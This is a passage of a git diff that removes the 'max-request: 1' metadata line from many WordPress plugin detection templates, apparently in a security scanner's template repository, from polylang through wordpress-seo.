a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 89602f4264..eb6e1aaa5d 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/polylang/ metadata: - max-request: 1 plugin_namespace: polylang wpscan: https://wpscan.com/plugin/polylang tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml index 2f6513ca42..b3c83cd0bf 100644 --- a/http/technologies/wordpress/plugins/popup-builder.yaml +++ b/http/technologies/wordpress/plugins/popup-builder.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/popup-builder/ metadata: - max-request: 1 plugin_namespace: popup-builder wpscan: https://wpscan.com/plugin/popup-builder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 982306b13c..96d8bd6aca 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/popup-maker/ metadata: - max-request: 1 plugin_namespace: popup-maker wpscan: https://wpscan.com/plugin/popup-maker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index fdcac13b56..85955ac95e 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/post-smtp/ metadata: - max-request: 1 plugin_namespace: post-smtp wpscan: https://wpscan.com/plugin/post-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index fc316f9f7a..a81fc892ca 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/post-types-order/ metadata: - max-request: 1 plugin_namespace: post-types-order wpscan: https://wpscan.com/plugin/post-types-order tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 975b63f5de..d9c6052cd7 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/premium-addons-for-elementor/ metadata: - max-request: 1 plugin_namespace: premium-addons-for-elementor wpscan: https://wpscan.com/plugin/premium-addons-for-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 5065659e82..afc1141e0c 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pretty-link/ metadata: - max-request: 1 plugin_namespace: pretty-link wpscan: https://wpscan.com/plugin/pretty-link tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index 732ffbc4eb..d44add9ca6 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/really-simple-captcha/ metadata: - max-request: 1 plugin_namespace: really-simple-captcha wpscan: https://wpscan.com/plugin/really-simple-captcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 12dffeb534..20ba5c2e16 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/really-simple-ssl/ metadata: - max-request: 1 plugin_namespace: really-simple-ssl wpscan: https://wpscan.com/plugin/really-simple-ssl tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index ae0e76c4bb..cbcf3cf09d 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/redirection/ metadata: - max-request: 1 plugin_namespace: redirection wpscan: https://wpscan.com/plugin/redirection tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index b1718d1ccb..3311d42c94 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/redux-framework/ metadata: - max-request: 1 plugin_namespace: redux-framework wpscan: https://wpscan.com/plugin/redux-framework tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 7543ac1d55..46c1c22805 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/regenerate-thumbnails/ metadata: - max-request: 1 plugin_namespace: regenerate-thumbnails wpscan: https://wpscan.com/plugin/regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 4a29cecdb0..7c13b8d2a4 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/safe-svg/ metadata: - max-request: 1 plugin_namespace: safe-svg wpscan: https://wpscan.com/plugin/safe-svg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index be281d91e6..53b30ba721 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/seo-by-rank-math/ metadata: - max-request: 1 plugin_namespace: seo-by-rank-math wpscan: https://wpscan.com/plugin/seo-by-rank-math tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 6bd95ec077..9555d7aebd 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sg-cachepress/ metadata: - max-request: 1 plugin_namespace: sg-cachepress wpscan: https://wpscan.com/plugin/sg-cachepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 1fd64a5279..180266f448 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sg-security/ metadata: - max-request: 1 plugin_namespace: sg-security wpscan: https://wpscan.com/plugin/sg-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 648ee176ce..656ad7dfe5 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/shortcodes-ultimate/ metadata: - max-request: 1 plugin_namespace: shortcodes-ultimate wpscan: https://wpscan.com/plugin/shortcodes-ultimate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 7836d9554c..015fb97043 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/shortpixel-image-optimiser/ metadata: - max-request: 1 plugin_namespace: shortpixel-image-optimiser wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index ccd72e427a..1d5224b457 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/simple-custom-post-order/ metadata: - max-request: 1 plugin_namespace: simple-custom-post-order wpscan: https://wpscan.com/plugin/simple-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 3622b2c6b3..aafd6c6a38 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/siteguard/ metadata: - max-request: 1 plugin_namespace: siteguard wpscan: https://wpscan.com/plugin/siteguard tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index 9eff765d61..e10ab985da 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/siteorigin-panels/ metadata: - max-request: 1 plugin_namespace: siteorigin-panels wpscan: https://wpscan.com/plugin/siteorigin-panels tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index c856e1fa9e..9881b591ae 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/smart-slider-3/ metadata: - max-request: 1 plugin_namespace: smart-slider-3 wpscan: https://wpscan.com/plugin/smart-slider-3 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 008440cc58..0480b4b0e6 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/so-widgets-bundle/ metadata: - max-request: 1 plugin_namespace: so-widgets-bundle wpscan: https://wpscan.com/plugin/so-widgets-bundle tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 410776862f..26d525386b 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/ metadata: - max-request: 1 plugin_namespace: stops-core-theme-and-plugin-updates wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index f210a2a2f9..3920c5cf56 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sucuri-scanner/ metadata: - max-request: 1 plugin_namespace: sucuri-scanner wpscan: https://wpscan.com/plugin/sucuri-scanner tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index f1dd1bf150..f556786f5a 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/svg-support/ metadata: - max-request: 1 plugin_namespace: svg-support wpscan: https://wpscan.com/plugin/svg-support tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index a9ec913599..844e3d19a0 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/table-of-contents-plus/ metadata: - max-request: 1 plugin_namespace: table-of-contents-plus wpscan: https://wpscan.com/plugin/table-of-contents-plus tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index d38aeb0279..eb0f02f602 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/tablepress/ metadata: - max-request: 1 plugin_namespace: tablepress wpscan: https://wpscan.com/plugin/tablepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 07c43b9d80..755efd53fa 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/taxonomy-terms-order/ metadata: - max-request: 1 plugin_namespace: taxonomy-terms-order wpscan: https://wpscan.com/plugin/taxonomy-terms-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 83a849e11e..0403bb4e72 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/the-events-calendar/ metadata: - max-request: 1 plugin_namespace: the-events-calendar wpscan: https://wpscan.com/plugin/the-events-calendar tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml index c6100637d9..cd2632ea05 100644 --- a/http/technologies/wordpress/plugins/themeisle-companion.yaml +++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/themeisle-companion/ metadata: - max-request: 1 plugin_namespace: themeisle-companion wpscan: https://wpscan.com/plugin/themeisle-companion tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index 1f188b66c6..b5f8b822c7 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/tinymce-advanced/ metadata: - max-request: 1 plugin_namespace: tinymce-advanced wpscan: https://wpscan.com/plugin/tinymce-advanced tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 2c7b16cb44..85aaf7ff16 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/translatepress-multilingual/ metadata: - max-request: 1 plugin_namespace: translatepress-multilingual wpscan: https://wpscan.com/plugin/translatepress-multilingual tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 9d6afa8d3f..0af322b728 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/ metadata: - max-request: 1 plugin_namespace: ultimate-addons-for-gutenberg wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 48481fde3b..b7ad16e281 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/under-construction-page/ metadata: - max-request: 1 plugin_namespace: under-construction-page wpscan: https://wpscan.com/plugin/under-construction-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index b34d196268..10fd071b0b 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/updraftplus/ metadata: - max-request: 1 plugin_namespace: updraftplus wpscan: https://wpscan.com/plugin/updraftplus tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml index abec174ec3..401b0e479f 100644 --- a/http/technologies/wordpress/plugins/use-any-font.yaml +++ b/http/technologies/wordpress/plugins/use-any-font.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/use-any-font/ metadata: - max-request: 1 plugin_namespace: use-any-font wpscan: https://wpscan.com/plugin/use-any-font tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index e088ac07a6..6f95506748 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/user-role-editor/ metadata: - max-request: 1 plugin_namespace: user-role-editor wpscan: https://wpscan.com/plugin/user-role-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml index 8b163200bf..4404f87aab 100644 --- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml +++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/velvet-blues-update-urls/ metadata: - max-request: 1 plugin_namespace: velvet-blues-update-urls wpscan: https://wpscan.com/plugin/velvet-blues-update-urls tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 2366a7dad7..8995434fce 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/w3-total-cache/ metadata: - max-request: 1 plugin_namespace: w3-total-cache wpscan: https://wpscan.com/plugin/w3-total-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 71448e61e8..8175806cb8 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/webp-converter-for-media/ metadata: - max-request: 1 plugin_namespace: webp-converter-for-media wpscan: https://wpscan.com/plugin/webp-converter-for-media tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 717554b89f..db82bc7f43 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/webp-express/ metadata: - max-request: 1 plugin_namespace: webp-express wpscan: https://wpscan.com/plugin/webp-express tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index fba5c8b09c..03ddae57bc 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/widget-importer-exporter/ metadata: - max-request: 1 plugin_namespace: widget-importer-exporter wpscan: https://wpscan.com/plugin/widget-importer-exporter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index 631202198e..d6449bb5bf 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-cart-abandonment-recovery/ metadata: - max-request: 1 plugin_namespace: woo-cart-abandonment-recovery wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index cc953078eb..2d5fdf1779 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-checkout-field-editor-pro/ metadata: - max-request: 1 plugin_namespace: woo-checkout-field-editor-pro wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 97ce674116..6b5705e20d 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-variation-swatches/ metadata: - max-request: 1 plugin_namespace: woo-variation-swatches wpscan: https://wpscan.com/plugin/woo-variation-swatches tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml index 6d05a6f058..dbcdb64bad 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/ metadata: - max-request: 1 plugin_namespace: woocommerce-gateway-paypal-express-checkout wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index baf5af3bb5..fb9ea502ce 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-stripe/ metadata: - max-request: 1 plugin_namespace: woocommerce-gateway-stripe wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 54dce49b42..1d41b4ec2c 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-payments/ metadata: - max-request: 1 plugin_namespace: woocommerce-payments wpscan: https://wpscan.com/plugin/woocommerce-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 5fae796fdd..4fa6fc3ffe 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-paypal-payments/ metadata: - max-request: 1 plugin_namespace: woocommerce-paypal-payments wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 22f812e2b8..1c1c690fcd 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/ metadata: - max-request: 1 plugin_namespace: woocommerce-pdf-invoices-packing-slips wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index c637006d26..4d6702d81a 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-services/ metadata: - max-request: 1 plugin_namespace: woocommerce-services wpscan: https://wpscan.com/plugin/woocommerce-services tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index e020507ccb..42cb8bc409 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce/ metadata: - max-request: 1 plugin_namespace: woocommerce wpscan: https://wpscan.com/plugin/woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index c92903fd79..55d6effbf5 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordfence/ metadata: - max-request: 1 plugin_namespace: wordfence wpscan: https://wpscan.com/plugin/wordfence tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index c25b2c1c48..6786cab703 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordpress-importer/ metadata: - max-request: 1 plugin_namespace: wordpress-importer wpscan: https://wpscan.com/plugin/wordpress-importer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 4d6dd14d25..784ba22c8a 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordpress-seo/ metadata: - max-request: 